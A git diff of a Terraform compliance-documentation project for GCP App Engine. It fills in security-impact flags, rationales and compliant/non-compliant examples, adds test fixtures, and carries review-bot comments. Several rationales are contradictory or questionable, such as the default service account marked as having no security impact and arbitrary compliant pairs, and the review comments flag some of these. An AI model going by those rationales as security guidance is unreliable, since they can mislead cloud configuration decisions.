@@ -729,8 +729,8 @@ "max_total_instances": { "description": "Maximum number of instances that should be started to handle requests for this version. Default: 20", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid denial-of-service scenarios, as the application cannot scale to meet a legitimate traffic surge and resulting in request timeouts/503 errors.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -738,8 +738,8 @@ "max_pending_latency": { "description": "Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Forces requests to sit in a queue for too long before the App Engine autoscaler triggers a new instance.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -747,8 +747,8 @@ "min_idle_instances": { "description": "Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the App Engine autoscaler can ingest performance metrics during traffic surges.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -756,8 +756,8 @@ "min_total_instances": { "description": "Minimum number of running instances that should be maintained for this version. Default: 2", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure of allowing the environment to fully de-provision resources during periods of zero activity.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" 
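Review bot: The `max_total_instances` rationale ("Avoid denial-of-service scenarios, as the application cannot scale to meet a legitimate traffic surge ...") argues that a cap set too low has availability impact, which contradicts `security_impact: false` and the parent `automatic_scaling` rationale about "strict guardrails on resource consumption" (an unbounded cap is the other failure mode); either mark it `true` with a floor and a ceiling, or rewrite the rationale to say why the value is left to the workload. Grammar: `min_total_instances` ("To ensure of allowing ...") and `min_idle_instances` ("To ensure the ... autoscaler can ingest performance metrics") need rewording so they state a reason.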
@@ -765,8 +765,8 @@ "min_pending_latency": { "description": "Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Optimal wait time before scaling is highly dependent on a specific workload", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -774,8 +774,8 @@ "request_utilization": { "description": "Target scaling by request utilization. Structure is [documented below](#nested_automatic_scaling_request_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Can be unreliable if request processing times vary whereas relying on CPU utilisation provides a more accurate measure of when an instance is actually working at its limit.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -783,8 +783,8 @@ "disk_utilization": { "description": "Target scaling by disk usage. Structure is [documented below](#nested_automatic_scaling_disk_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Typically bottlenecked by CPU or memory rather than storage.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -792,8 +792,8 @@ "network_utilization": { "description": "Target scaling by network usage. Structure is [documented below](#nested_automatic_scaling_network_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Scaling based on data throughput can be highly inconsistent while CPU-based scaling provides a more stable and accurate signal for when an instance is reaching its operational capacity.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" 
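Review bot: Style in this line: the `min_pending_latency` rationale lacks a terminating period, and the `disk_utilization` and `request_utilization` rationales are subjectless fragments ("Typically bottlenecked by ...", "Can be unreliable if ..."); give each a subject ("Flexible instances are typically ..."). The rationales for `request_utilization`, `disk_utilization` and `network_utilization` explain a preference for CPU-based scaling rather than why the field has no security impact; one sentence stating that these are tuning knobs with no trust-boundary effect would make the `false` explicit.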
@@ -803,8 +803,8 @@ "manual_scaling": { "description": "A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Lacks the ability to adjust to real-time traffic changes, which can lead to unexpected traffic spikes.", "compliant": null, "non-compliant": null, "parent": null, @@ -822,27 +822,27 @@ }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID", "compliant": null, "non-compliant": null, "parent": null }, "noop_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the application version will not be deleted.", + "required": false, + "security_impact": false, + "rationale": "Ensure that the Terraform state remains a truthful representation of the cloud environment.", "compliant": null, "non-compliant": null, "parent": null }, "delete_service_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the service will be deleted if it is the last version.", + "required": false, + "security_impact": false, + "rationale": "To prevent the accidental deletion of an entire service logical grouping when only a specific version is being decommissioned", "compliant": null, "non-compliant": null, "parent": null 
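Review bot: The `noop_on_destroy` rationale ("Ensure that the Terraform state remains a truthful representation of the cloud environment") contradicts the new description ("the application version will not be deleted"): a version left running after Terraform has dropped it is exactly how state and environment diverge, so either say why that divergence is acceptable or reconsider `security_impact: false`. The `manual_scaling` rationale has the causality backwards ("Lacks the ability to adjust ... which can lead to unexpected traffic spikes"): manual scaling does not cause spikes, it fails to absorb them. `delete_service_on_destroy` lacks a terminating period.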
@@ -980,10 +980,10 @@ } }, "zip": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Zip", + "required": false, + "security_impact": true, + "rationale": "Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage.", "compliant": null, "non-compliant": null, "parent": null, @@ -991,10 +991,10 @@ "source_url": { "description": "Source URL", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure that the application's source code is retrieved from a managed version-controlled repository, using an immutable path.", + "compliant": "https://storage.googleapis.com/hardhat-bucket/hello-world.zip", + "non-compliant": "invalid.com", "parent": "zip" }, "files_count": { diff --git a/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json b/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json index b39323b1f..2635db0ac 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json 
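Review bot: In the `source_url` hunk the compliant example `https://storage.googleapis.com/hardhat-bucket/hello-world.zip` does not demonstrate the "immutable path" the rationale requires (nothing in the path pins a specific object version), and the non-compliant `invalid.com` is not a URL at all, so the pair tests URL syntax rather than source provenance; use a non-compliant URL that is well-formed but outside the approved bucket, and say what "immutable" means for the check. Replacing the empty `zip` description with "Zip" adds nothing; describe the block (what the nested `source_url` and `files_count` fields cover).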
@@ -5,17 +5,17 @@ "service": { "description": "The name of the service these settings apply to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to establish a verifiable network perimeter at the application layer.", + "compliant": "app-internal-service", + "non-compliant": "internal-service", "parent": null }, "network_settings": { "description": "Ingress settings for this service. Will apply to all versions. Structure is [documented below](#nested_network_settings).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure the definition of the fundamental trust boundary of the application", "compliant": null, "non-compliant": null, "parent": null, @@ -23,19 +23,19 @@ "ingress_traffic_allowed": { "description": "The ingress settings for version or service. Default value is `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`. Possible values are: `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`, `INGRESS_TRAFFIC_ALLOWED_ALL`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Is enforced to mitigate the risk of direct-to-origin attacks from occurring. By ensuring that the default unshielded App Engine URL is disabled.", + "compliant": "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY", + "non-compliant": "INGRESS_TRAFFIC_ALLOWED_ALL", "parent": "network_settings" } } }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null 
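Review bot: The `ingress_traffic_allowed` hunk lists `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY` as the only compliant value, but the rationale is about blocking direct-to-origin access, which `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB` (in the description's value list) also achieves for services fronted by a load balancer; treat both as compliant and `INGRESS_TRAFFIC_ALLOWED_ALL` plus `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED` (the documented default) as non-compliant, otherwise every internet-facing service fails the check. The rationale is also broken into a fragment ("... from occurring. By ensuring that ..."). The `service` pair (`app-internal-service` vs `internal-service`) implies a naming prefix the rationale never states, and a service name does not by itself establish a "network perimeter".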
diff --git a/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json b/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json index a27e0659d..10d656b0a 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json @@ -5,17 +5,17 @@ "service": { "description": "The name of the service these settings apply to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure that traffic splitting configurations are explicitly mapped to the correct logical microservice.", + "compliant": "hardhat-main-api", + "non-compliant": "generic-api", "parent": null }, "split": { "description": "Mapping that defines fractional HTTP traffic diversion to different versions within the service. Structure is [documented below](#nested_split).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To ensure that traffic distribution is managed as code and providing an automated way to transition users to new versions while maintaining a clear record of routing logic.", "compliant": null, "non-compliant": null, "parent": null, 
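Review bot: The `service` example pair (`hardhat-main-api` vs `generic-api`) encodes a naming rule that the rationale ("explicitly mapped to the correct logical microservice") never states; either define the convention or drop the pair, since a reader cannot tell what makes `generic-api` non-compliant. Grammar: the `split` rationale ("... managed as code and providing an automated way ...") mixes verb forms; "and provides" reads cleanly.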
@@ -23,19 +23,19 @@ "shard_by": { "description": "Mechanism used to determine which version a request is sent to. The traffic selection algorithm will be stable for either type until allocations are changed. Possible values are: `UNSPECIFIED`, `COOKIE`, `IP`, `RANDOM`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define how traffic is distributed through versions, ensuring that users have a consistent experience by consistently routing them to the same version based on their IP address.", + "compliant": "IP", + "non-compliant": "RANDOM", "parent": "split" }, "allocations": { "description": "Mapping from version IDs within the service to fractional (0.000, 1] allocations of traffic for that version. Each version can be specified only once, but some versions in the service may not have any traffic allocation. Services that have traffic allocated cannot be deleted until either the service is deleted or their traffic allocation is removed. Allocations must sum to 1. Up to two decimal place precision is supported for IP-based splits and up to three decimal places is supported for cookie-based splits.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring to provide precise control over the percentage of traffic directed to specific versions.", + "compliant": "v1 = 0.8 v2 = 0.2", + "non-compliant": "v1 = 0.0 v2 = 1.0", "parent": "split" } } 
@@ -43,17 +43,17 @@ "migrate_traffic": { "description": "If set to true traffic will be migrated to this version.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Allowing to ensure the system to warm up new instances and preventing sudden latency spikes for users during a deployment.", + "compliant": "false", + "non-compliant": "true", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json b/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json index a97986370..8b683328f 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_standard_app_version.json 
@@ -5,17 +5,17 @@ "runtime": { "description": "Desired runtime. Example python27.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring the application executes in the correct environment with the specific language version required for its dependencies.", + "compliant": "nodejs20", + "non-compliant": "nodejs10", "parent": null }, "deployment": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To define the specific source code and files that constitute the application version ensuring that Terraform can verify and upload the correct assets to the environment.", "compliant": null, "non-compliant": null, "parent": null, @@ -23,8 +23,8 @@ "zip": { "description": "Zip File Structure is [documented below](#nested_deployment_zip).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Provides a direct way to package the application's source code.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -32,8 +32,8 @@ "files": { "description": "Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To simplify the configuration and ensure that the application package is deployed as a single consistent unit rather than managing individual file paths manually.", "compliant": null, "non-compliant": null, "parent": "deployment" 
@@ -43,8 +43,8 @@ "entrypoint": { "description": "The entrypoint for the application. Structure is [documented below](#nested_entrypoint).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "To provide the specific command required to start the application, ensuring that the environment knows how to execute the code, with which port/startup script to initialize.", "compliant": null, "non-compliant": null, "parent": null, @@ -52,10 +52,10 @@ "shell": { "description": "The format should be a shell command that can be fed to bash -c.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define the startup command, as it allows for the execution of complex scripts/multiple commands within the standard shell environment.", + "compliant": "node ./app.js", + "non-compliant": "bash ./app.js", "parent": "entrypoint" } } 
@@ -63,17 +63,17 @@ "service": { "description": "AppEngine service resource", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring the application is deployed as a specific microservice, allowing for independent scaling and routing logic within the larger App Engine project.", + "compliant": "default", + "non-compliant": "unauthorized-app-name", "parent": null }, "version_id": { "description": "Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,\"default\", \"latest\", and any name with the prefix \"ah-\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To automatically generate unique timestamp identifiers for each deployment, inturn preventing naming conflicts and ensuring that new releases do not accidentally overwrite existing versions.", "compliant": null, "non-compliant": null, "parent": null @@ -81,8 +81,8 @@ "service_account": { "description": "The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Having utilise the default App Engine service account, simplifying permission management by leveraging the standard identity provided by the platform for accessing Google Cloud resources.", "compliant": null, "non-compliant": null, "parent": null 
@@ -90,8 +90,8 @@ "threadsafe": { "description": "Whether multiple requests can be dispatched to this version at once.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Environment to use its default concurrency settings, ensuring the application remains stable and avoids race conditions if the codebase is not optimized for parallel request handling.", "compliant": null, "non-compliant": null, "parent": null @@ -99,8 +99,8 @@ "app_engine_apis": { "description": "Allows App Engine second generation runtimes to access the legacy bundled services.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the application remains modern and portable", "compliant": null, "non-compliant": null, "parent": null @@ -108,8 +108,8 @@ "runtime_api_version": { "description": "The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The application utilises a second-generation runtime where the API version is automatically managed by the platform, ensuring the environment always uses the most compatible interface without manual intervention.", "compliant": null, "non-compliant": null, "parent": null 
@@ -117,8 +117,8 @@ "handlers": { "description": "An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "For a more flexible and unified approach to request handling without platform-specific configuration.", "compliant": null, "non-compliant": null, "parent": null, @@ -191,8 +191,8 @@ "libraries": { "description": "Configuration for third-party Python runtime libraries that are required by the application. Structure is [documented below](#nested_libraries).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Uses a second-generation runtime that manages dependencies through standard package managers.", "compliant": null, "non-compliant": null, "parent": null, @@ -220,8 +220,8 @@ "env_variables": { "description": "Environment variables available to the application.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid hardcoding sensitive/environment-specific data in the deployment manifest.", "compliant": null, "non-compliant": null, "parent": null @@ -229,8 +229,8 @@ "vpc_access_connector": { "description": "Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "interacts with public APIs/managed services that do not require a private connection to a Virtual Private Cloud which reduces infrastructure complexity.", "compliant": null, "non-compliant": null, "parent": null, 
@@ -258,8 +258,8 @@ "inbound_services": { "description": "A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Does not require specialised App Engine-specific features, allowing it to remain a standard web service with a smaller configuration footprint.", "compliant": null, "non-compliant": null, "parent": null @@ -267,17 +267,17 @@ "instance_class": { "description": "Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G BasicScaling or ManualScaling: B1, B2, B4, B4_1G, B8 Defaults to F1 for AutomaticScaling and B2 for ManualScaling and BasicScaling. If no scaling is specified, AutomaticScaling is chosen.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Defined to ensure the application has the specific CPU and memory resources required for its workload.", + "compliant": "F1", + "non-compliant": "F2", "parent": null }, "automatic_scaling": { "description": "Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To prevent the application from scaling up to aggressively during minor traffic fluctuations.", "compliant": null, "non-compliant": null, "parent": null, 
@@ -341,8 +341,8 @@ "basic_scaling": { "description": "Basic scaling creates instances when your application receives requests. Each instance will be shut down when the application becomes idle. Basic scaling is ideal for work that is intermittent or driven by user activity. Structure is [documented below](#nested_basic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid the latency delays in relation with starting instances from zero after periods of inactivity.", "compliant": null, "non-compliant": null, "parent": null, @@ -370,8 +370,8 @@ "manual_scaling": { "description": "A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the system can instead respond dynamically to traffic changes without the risk of over-provisioning/service outages during unexpected load.", "compliant": null, "non-compliant": null, "parent": null, 
@@ -389,36 +389,36 @@ }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null }, "noop_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the application version will not be deleted.", + "required": false, + "security_impact": false, + "rationale": "To ensure Terraform can fully decommission the application version.", "compliant": null, "non-compliant": null, "parent": null }, "delete_service_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the service will be deleted if it is the last version.", + "required": false, + "security_impact": false, + "rationale": "Prevent the accidental removal of the entire service and its versions when a specific version is decommissioned.", "compliant": null, "non-compliant": null, "parent": null }, "zip": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Zip", + "required": false, + "security_impact": true, + "rationale": "Provides a direct way to package the application's source code.", "compliant": null, "non-compliant": null, "parent": null, 
@@ -426,10 +426,10 @@ "source_url": { "description": "Source URL", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Ensuring that the deployment process uses a verified artifact that is consistent across all environments.", + "compliant": "https://storage.googleapis.com/appengine-static-content/hello-world.zip", + "non-compliant": "https://storage.googleapis.com/malicious-bucket/exploit.zip", "parent": "zip" }, "files_count": { diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl new file mode 100644 index 000000000..83b50a830 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.14.0" + hashes = [ + "h1:Rq4R8clqn9QByUbg3ZUc0bnvUalIphJTxOanUeD7y9Q=", + "zh:0dc10c3bbb58a532eb2e1f146af2bbb0748c2d4229d4c3809aeb0e3659159f26", + "zh:1d03027fad0ba6c9adca7ec69f29672084e589c5a5cfe5e81ffac572eeff7ebf", + "zh:50595efb23deec9fbac47441ba53ad20e9bc9218458475d68d668c3270ab6f58", + "zh:5a63cead67c76efeef8f821c064653fd4fc00cfc83ea6b1cd96d648346a818b2", + "zh:62057d22a94072123e6b63cd256e6cce88565b63363edbe508a44412b4707e9f", + "zh:661e90a6433bcf65f18d7064bbaa37ec6eec74e9f93c36a2ba9d11df90c0da55", + "zh:a4d11fa451ac562c4eea8b82aea6722dcfa0259f67b0cc94b05ed82cd9abc995", + "zh:dd82e44e83c13a34fa04f1c38024bf1d9a6a5496a165be16da3111db553fb3d7", + "zh:e88edd18f4102e24191384f4dddb56e8ed9235cd4feeea202f8da0fe001ec3ff", + "zh:ec7bf788161013bb0cf6a9394f9c5ddd8dc4d24f233a12a23b1be632d979d443", + "zh:f2d88ef4c8c88b9723cd9cef14d37c6461b36c3475a394e69e0c0156157b678a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/c.tf b/inputs/gcp/app_engine/app_engine_application/database_type/c.tf new file mode 100644 index 000000000..4981324c3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/c.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "c" { + project = "gcp-test-project" + location_id = "us-central" + database_type = "CLOUD_FIRESTORE" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/config.tf b/inputs/gcp/app_engine/app_engine_application/database_type/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf b/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf new file mode 100644 index 000000000..2764d470c --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/database_type/nc.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-test-project" + location_id = "us-central" + database_type = "CLOUD_DATASTORE_COMPATIBILITY" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/database_type/plan.json b/inputs/gcp/app_engine/app_engine_application/database_type/plan.json new file mode 100644 index 000000000..a4e352ff3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/database_type/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf new file mode 100644 index 000000000..4e8698f79 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + feature_settings { + split_health_checks = true + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf new file mode 100644 index 000000000..082ede499 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + + feature_settings { + split_health_checks = false + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json new file mode 100644 index 000000000..ee7e949c3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/iap/oauth2_client_id/c.tf 